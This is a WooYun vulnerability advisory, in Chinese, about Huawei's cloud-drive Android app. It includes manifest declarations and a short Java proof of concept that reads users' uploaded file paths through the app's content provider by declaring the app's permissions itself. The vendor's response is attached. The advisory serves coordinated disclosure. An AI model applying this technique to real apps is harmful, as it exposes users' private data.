华为网盘content provider组件可能泄漏用户信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-057590

漏洞标题：华为网盘content provider组件可能泄漏用户信息

漏洞作者：瘦蛟舞

提交时间：2014-05-12 17:49

修复时间：2014-08-10 17:50

公开时间：2014-08-10 17:50

漏洞类型：用户敏感数据泄漏

危害等级：中

自评Rank：6

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-12：细节已通知厂商并且等待厂商处理中
2014-05-13：厂商已经确认，细节仅向厂商公开
2014-05-16：细节向第三方安全合作伙伴开放
2014-07-07：细节向核心白帽子及相关领域专家公开
2014-07-17：细节向普通白帽子公开
2014-07-27：细节向实习白帽子公开
2014-08-10：细节向公众公开

简要描述：

华为网盘content provider组件可能泄漏用户信息

详细说明：

1.查看配置文件，还是做了防护的

<provider android:authorities="com.huawei.dbank.v7.provider.DbankGallery" android:name="com.huawei.dbank.v7.service.data.album.GalleryProvider" android:readPermission="com.huawei.dbank.v7.provider.DbankGallery.READ_DATABASE" android:writePermission="com.huawei.dbank.v7.provider.DbankGallery.WRITE_DATABASE"/>
        <provider android:authorities="com.huawei.dbank.v7.provider.DBank" android:name=".service.data.DBankProvider" android:readPermission="com.huawei.dbank.v7.provider.DBank.READ_DATABASE" android:writePermission="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE"/>

2.但是如果在manifest中做如下权限申明依旧可以同过content provider组件访问网盘sqlite中的数据

<uses-permission android:name="com.huawei.dbank.v7.provider.DBank.READ_DATABASE"/>
    <uses-permission android:name="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE"/>
    <permission android:name="com.huawei.dbank.v7.provider.DBank.READ_DATABASE" android:protectionLevel="dangerous"></permission>
    <permission android:name="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE" android:protectionLevel="dangerous"></permission>

3.反编译app后查看uri

漏洞证明：

4.poc如下

public void dbank(View v){
		ContentResolver content = getContentResolver();
		Uri uri = Uri.parse("content://com.huawei.dbank.v7.provider.DBank/uploaditem");
		Cursor cursor = content.query(uri, null, null, null, null);
		while(cursor.moveToNext()){
			String path = cursor.getString(cursor.getColumnIndex("filePath"));
			System.out.println("path="+path);
		}

5.查看用户上传的文件路径。

修复方案：

版权声明：转载请注明来源瘦蛟舞@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2014-05-13 12:05

厂商回复：

感谢白帽子提醒！不涉及文件内容泄露，产品修复中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-057590

漏洞标题：华为网盘content provider组件可能泄漏用户信息

相关厂商：华为技术有限公司

漏洞作者：瘦蛟舞

提交时间：2014-05-12 17:49

修复时间：2014-08-10 17:50

公开时间：2014-08-10 17:50

漏洞类型：用户敏感数据泄漏

危害等级：中

自评Rank：6

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源瘦蛟舞@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-057590

漏洞标题：华为网盘content provider组件可能泄漏用户信息

相关厂商：华为技术有限公司

漏洞作者： 瘦蛟舞

提交时间：2014-05-12 17:49

修复时间：2014-08-10 17:50

公开时间：2014-08-10 17:50

漏洞类型：用户敏感数据泄漏

危害等级：中

自评Rank：6

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-057590"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 瘦蛟舞@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：瘦蛟舞

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源瘦蛟舞@乌云